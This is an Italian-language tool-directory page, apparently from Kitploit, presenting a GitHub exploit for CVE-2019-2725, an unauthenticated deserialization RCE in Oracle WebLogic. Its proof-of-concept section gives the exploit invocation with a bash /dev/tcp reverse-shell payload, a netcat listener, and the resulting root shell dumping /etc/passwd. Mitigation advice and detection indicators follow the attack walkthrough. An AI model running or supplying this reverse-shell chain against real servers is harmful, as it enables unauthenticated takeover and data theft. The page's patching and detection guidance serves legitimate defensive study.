Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Oracle-Weblogic-Server-AsyncResponseService-Deserialization-Remote-Code-Execution-CVE-2019-2725 — Vulnerabilità nel componente Oracle WebLogic Server di Oracle Fusion Middleware (sottocomponente: Web Services). Le versioni supportate interessate sono 10.3.6.0.0 e 12.1.3.0.0. La vulnerabilità, facilmente sfruttabile, consente a un attaccante non autenticato con accesso alla rete tramite HTTP di compromettere Oracle WebLogic Server. | Kitploit
Strumenti/GitHubGitHub/loursha/oracle-weblogic-server-asyncresponseservice-deserialization-remote-code-execution-cve-2019-2725
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingStrumento di Accesso Remoto
GitHubloursha/oracle-weblogic-server-asyncresponseservice-deserialization-remote-code-execution-cve-2019-2725

Oracle-Weblogic-Server-AsyncResponseService-Deserialization-Remote-Code-Execution-CVE-2019-2725

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
7 mesi faNon ancora revisionato

Informazioni

Vulnerabilità nel componente Oracle WebLogic Server di Oracle Fusion Middleware (sottocomponente: Web Services). Le versioni supportate interessate sono 10.3.6.0.0 e 12.1.3.0.0. La vulnerabilità, facilmente sfruttabile, consente a un attaccante non autenticato con accesso alla rete tramite HTTP di compromettere Oracle WebLogic Server.

Condividi

CVE-2019-2725 – Esecuzione remota di codice non autenticata in Oracle WebLogic

Vulnerabilità nel componente Oracle WebLogic Server di Oracle Fusion Middleware (sottocomponente: Web Services). Le versioni supportate interessate sono 10.3.6.0.0 e 12.1.3.0.0. Una vulnerabilità facilmente sfruttabile consente a un attaccante non autenticato con accesso di rete via HTTP di compromettere Oracle WebLogic Server.

Panoramica della vulnerabilità

CVE ID: CVE-2019-2725
Gravità: Critica (CVSS v3: 9.8)
Tipo di vulnerabilità: Esecuzione remota di codice non autenticata (RCE)
Prodotto interessato: Oracle WebLogic Server
Componente interessato: AsyncResponseService
Autenticazione richiesta: No
Interazione utente richiesta: No

CVE-2019-2725 è una vulnerabilità critica di deserializzazione in Oracle WebLogic Server che consente ad attaccanti remoti non autenticati di eseguire comandi di sistema arbitrari tramite una richiesta SOAP appositamente predisposta inviata all'endpoint /_async/AsyncResponseService.


Versioni interessate

Versioni di Oracle WebLogic Server precedenti al Critical Patch Update di aprile 2019, incluse ma non limitate a:

  • WebLogic 10.3.6
  • WebLogic 12.1.3
  • WebLogic 12.2.1.3

Descrizione della vulnerabilità

La vulnerabilità è dovuta a deserializzazione non sicura in AsyncResponseService.
Un attaccante può inviare un payload XML dannoso che porta all'esecuzione arbitraria di comandi sul sistema operativo sottostante senza autenticazione.

Questo problema è particolarmente pericoloso perché:

  • L'endpoint è spesso esposto esternamente
  • Non sono richieste credenziali valide
  • Lo sfruttamento porta direttamente a compromissione totale del sistema

Scenario di attacco

  1. L'attaccante identifica un'istanza WebLogic esposta
  2. L'attaccante invia una richiesta SOAP dannosa a:
  3. WebLogic deserializza i dati controllati dall'attaccante
  4. Vengono eseguiti comandi di sistema arbitrari
  5. L'attaccante ottiene accesso a una shell remota

Prova di concetto (PoC)

🔹 Listener dell'attaccante (seconda CLI)

Avvia un listener Netcat per ricevere la shell inversa:

root@kitploit:~
nc -lvp 2323

🔹 Esecuzione dell'exploit (prima CLI)

Esegui lo script dell'exploit contro il server WebLogic vulnerabile:

root@kitploit:~
python3 CVE-2019-2725.py http://172.17.0.6:7001/_async/AsyncResponseService '/bin/bash -i >& /dev/tcp/172.17.0.10/2323 0>&1'

Output previsto:

root@kitploit:~
[+] Target appears VULNERABLE
[*] Sending payload...
[+] Payload delivered successfully (HTTP 202)

🔹 Risultato dello sfruttamento riuscito

Sul listener Netcat viene ricevuta una shell inversa:

root@kitploit:~
Listening on 0.0.0.0 2323
Connection received on 172.17.0.6 39926
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain#

root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain# whoami
root
root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain#

root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain# pwd
/root/Oracle/Middleware/user_projects/domains/base_domain
root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain#

root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain#

Mitigazione e rimedio

Azioni consigliate

  1. Applicare il Critical Patch Update (CPU) di Oracle di aprile 2019
  • Aggiornare Oracle WebLogic Server a una versione che include le correzioni di sicurezza di aprile 2019 fornite da Oracle https://www.oracle.com/security-alerts/alert-cve-2019-2725.html
  1. Limitare l'accesso all'endpoint vulnerabile
  • Questo conferma l'esecuzione remota di comandi e l'accesso a livello di sistema.
  • Assicurarsi che questo endpoint non sia esposto a reti non affidabili
  • Limitare l'accesso solo a intervalli IP interni o affidabili
  1. Bloccare l'accesso non affidabile tramite controlli di rete
  • Implementare regole firewall rigorose
  • Applicare il controllo degli accessi tramite proxy inversi
  • Disabilitare l'accesso esterno non necessario ai servizi di gestione e async di WebLogic
  1. Abilitare la registrazione e il monitoraggio continuo
  • Monitorare i log di accesso HTTP
  • Avvisare in caso di modelli di richiesta anomali verso endpoint async

Indicatori di rilevamento

I seguenti indicatori possono suggerire un tentativo o uno sfruttamento riuscito:

🔍 Indicatori di rete e applicativi

  • Richieste a:
  • Payload SOAP/XML sospetti o malformati
  • Risposte ripetute HTTP 202 Accepted dai servizi async

🔍 Indicatori basati sull'host

  • Connessioni di rete in uscita avviate da WebLogic Server
  • Esecuzione di shell inattesa come:
  • /bin/bash
  • /bin/sh
  • Creazione di connessioni shell inversa verso IP o porte sconosciuti

Raccomandazioni per il monitoraggio della sicurezza

  • Abilitare le firme IDS/IPS per i modelli noti di sfruttamento SOAP di WebLogic
  • Monitorare il traffico in uscita dai server WebLogic
  • Implementare l'esecuzione con privilegi minimi per i servizi applicativi
  • Rivedere regolarmente i log di esecuzione dei processi WebLogic

Crediti

I seguenti repository pubblici sono stati consultati per la comprensione e la validazione dell'exploit:

  • https://github.com/lufeirider/CVE-2019-2725
  • https://github.com/pimps/CVE-2019-2725

Scarica lo strumento